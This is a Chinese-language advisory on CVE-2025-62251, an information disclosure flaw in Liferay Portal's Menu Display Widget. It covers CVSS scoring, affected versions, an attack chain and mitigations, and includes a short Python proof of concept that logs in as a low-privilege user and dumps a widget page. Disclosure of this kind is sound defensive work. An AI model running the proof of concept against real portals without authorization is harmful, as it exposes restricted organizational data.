CVE-2025-62251：Liferay Portal菜单显示组件信息泄露漏洞

漏洞信息

漏洞编号

CVE-2025-62251

漏洞类型

信息泄露（权限绕过）

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Liferay Portal / Liferay DXP

漏洞概述

CVE-2025-62251是Liferay Portal及其商业版本Liferay DXP中存在的一个信息泄露漏洞。该漏洞源于Menu Display Widget（菜单显示组件）在权限校验逻辑上存在缺陷，导致未授权用户能够查看其本无权限访问的内容。具体而言，当低权限用户通过Menu Display Widget请求页面或内容时，系统未能正确执行访问控制检查，从而将受保护的内容渲染并返回给用户。

根据CVSS 3.1评分向量（AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N），该漏洞的CVSS评分为6.5，属于中危级别。攻击者只需拥有低权限（PR:L）账号，通过网络（AV:N）即可发起攻击，无需用户交互（UI:N），且攻击复杂度低（AC:L）。漏洞的主要影响在于机密性（C:H），可能导致敏感信息暴露给未授权用户，而完整性和可用性不受影响。

该漏洞由[email protected]报告，Liferay官方已在2025年10月13日发布安全公告。受影响的版本范围广泛，涵盖Liferay Portal 7.3.0至7.4.3.119，以及Liferay DXP 2023.Q3.1至2023.Q4.5等多个季度版本。由于Liferay Portal被广泛应用于企业门户、内容管理和协作平台，此漏洞可能对使用该平台的组织的敏感数据安全构成威胁。

技术细节

该漏洞的核心问题在于Liferay Portal的Menu Display Widget组件未对用户权限进行充分的验证。当Widget被配置为展示特定页面或内容时，系统在渲染菜单项的过程中缺少对当前用户是否具有目标资源查看权限的检查。

从技术层面分析，Menu Display Widget用于在Liferay页面中动态生成导航菜单，通常根据页面结构或配置来展示可访问的页面链接。正常情况下，系统应仅展示当前用户有权访问的页面。然而，由于权限过滤逻辑的缺失或缺陷，Widget会将所有已配置的菜单项内容返回给请求用户，即使该用户无权查看对应的目标页面。

攻击利用方式如下：
1. 攻击者首先获取一个低权限的Liferay账号（普通用户级别即可）。
2. 攻击者定位部署了Menu Display Widget的页面。
3. 通过构造特定的请求或直接访问包含Menu Display Widget的页面，触发Widget的内容渲染逻辑。
4. Widget返回的响应中包含本应受权限保护的内容信息，攻击者从而获取未授权的数据。

由于漏洞影响范围限于信息泄露（机密性），且需要低权限认证，因此风险等级被评定为中危。但对于部署了包含敏感信息页面的企业环境，此漏洞仍可能造成严重的数据泄露后果。

攻击链分析

STEP 1

步骤1：获取低权限账号

攻击者通过注册、钓鱼或购买等方式获取目标Liferay Portal系统中的低权限用户账号，普通用户级别即可满足攻击条件。

STEP 2

步骤2：定位Menu Display Widget

攻击者浏览目标Liferay站点，寻找部署了Menu Display Widget的页面，该组件通常用于动态生成导航菜单。

STEP 3

步骤3：触发Widget渲染

攻击者访问包含Menu Display Widget的页面，触发Widget的内容渲染逻辑。由于权限校验缺失，Widget返回所有配置的菜单项内容。

STEP 4

步骤4：提取未授权内容

攻击者从Widget的响应中提取其本无权查看的页面内容、标题或其他敏感信息，实现信息泄露。

STEP 5

步骤5：数据利用

攻击者将获取的敏感信息用于进一步攻击，如社会工程、内部网络侦察或数据贩卖等。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-62251 PoC - Liferay Portal Menu Display Widget Info Disclosure
# Vulnerability: Menu Display Widget exposes content to unauthorized users
# Attack Vector: Network, Low Privilege Required

import requests

# Target Liferay Portal instance
TARGET_URL = "https://target-liferay-instance.com"
USERNAME = "low_privilege_user"
PASSWORD = "user_password"

# Step 1: Authenticate to obtain session
session = requests.Session()
login_url = f"{TARGET_URL}/c/portal/login"
login_params = {
    "p_p_id": "com_liferay_login_web_portlet_LoginPortlet",
    "p_p_lifecycle": "0",
    "_com_liferay_login_web_portlet_LoginPortlet_login": USERNAME,
    "_com_liferay_login_web_portlet_LoginPortlet_password": PASSWORD,
}
session.post(login_url, params=login_params)

# Step 2: Access page containing Menu Display Widget
# The widget fails to enforce permission checks and returns
# content from restricted pages in the menu structure
widget_page_url = f"{TARGET_URL}/web/guest/menu-display-page"
response = session.get(widget_page_url)

# Step 3: Extract sensitive content from the response
# The response contains menu items with content that the
# low-privilege user should not have access to
if response.status_code == 200:
    # Parse the response to find unauthorized content
    # Look for menu items, page titles, or content snippets
    # that reference restricted pages
    print("[+] Unauthorized content retrieved:")
    print(response.text)
else:
    print(f"[-] Request failed with status: {response.status_code}")

影响范围

Liferay Portal 7.3.0 ~ 7.4.3.119

Liferay DXP 2023.Q3.1 ~ 2023.Q3.8

Liferay DXP 2023.Q4.0 ~ 2023.Q4.5

Liferay DXP 7.4 GA ~ update 92

Liferay DXP 7.3 GA ~ update 36

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）审查并限制Menu Display Widget的使用范围，移除包含敏感内容的菜单配置；2）加强用户权限管理，确保低权限用户无法通过任何途径间接访问受限内容；3）部署WAF规则，监控和拦截异常的Widget内容请求；4）密切关注Liferay官方安全公告，在第一时间应用安全补丁。